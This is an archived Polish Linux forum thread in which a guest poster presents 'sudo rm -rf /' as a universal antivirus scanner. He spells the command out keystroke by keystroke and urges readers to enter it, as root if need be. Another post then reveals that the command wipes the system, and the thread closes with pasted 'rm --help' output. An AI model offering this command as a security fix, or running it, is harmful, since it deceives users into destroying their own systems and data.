Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

Gość linuksmen

Polecam skaner antywirusowy dla linuksa

Polecane posty

Gość linuksmen

trzeba tak zrobić : sudo(spacja)rm(spacja) -rf( spacja)/(slesz, inaczej ukośnik) potem enter i podasz swoje hasło, ogólnie tak trzeba to wpisać w konsoli ( terminalu) : sudo rm -rf / ja stosuje i bardzo pomaga

Gość linuksmen
Ale też można zamiast sudo zalogować się jako root i wpisać komende, to jest uniwersalny skaner dla KAŻDEGO , od dziś oglądanie doop w necie jest piękne i bezpieczne

Od siebie dodoam że komenda skasuje wszystko co ważne w systemie. :D I oczywiście nigdy nie używałem żadnego skanera antywirusowego do linuksa. Używałem ale do kanowmnia dysków z windą. :P

{ rm --help Składnia: rm ... PLIK... Usuwanie (unlink) PLIKU/ÓW. -d, --directory usunięcie PLIKU, nawet jeżeli jest to niepusty katalog (tylko super-user; działa tylko jeżli twój system umożliwia `unlink' dla niepustych katalogów) -f, --force zignorowanie nieistniejących plików, wyłączenie pytań -i, --interactive pytanie przed każdym usunięciem pliku --no-preserve-root do not treat `/' specially (the default) --preserve-root fail to operate recursively on `/' -r, -R, --recursive remove directories and their contents recursively -v, --verbose explain what is being done --help wyświetlenie tego opisu i zakończenie --version wyświetlenie informacji o wersji i zakończenie Domyślnie rm nie usuwa katalogów. Użyj opcji --recursive (albo -r albo -R) żeby skasować również wszystkie podane katalogi z zawartością. Żeby usunąć plik z nazwą zaczynająca się od `-', np. `-foo', można użyć jednego z poleceń: rm -- -foo rm ./-foo Warto zauważyć, że po użyciu rm do usunięcia pliku zazwyczaj można odtworzyć jego zawartość. Gdy istnieje potrzeba pewniejszego zagwarantowania, że zawartość pliku jest rzeczywiście nie do odtworzenia, należy rozważyć użycie programu shred. Raporty o błędach wysyłaj do bug-coreutils@gnu.org . }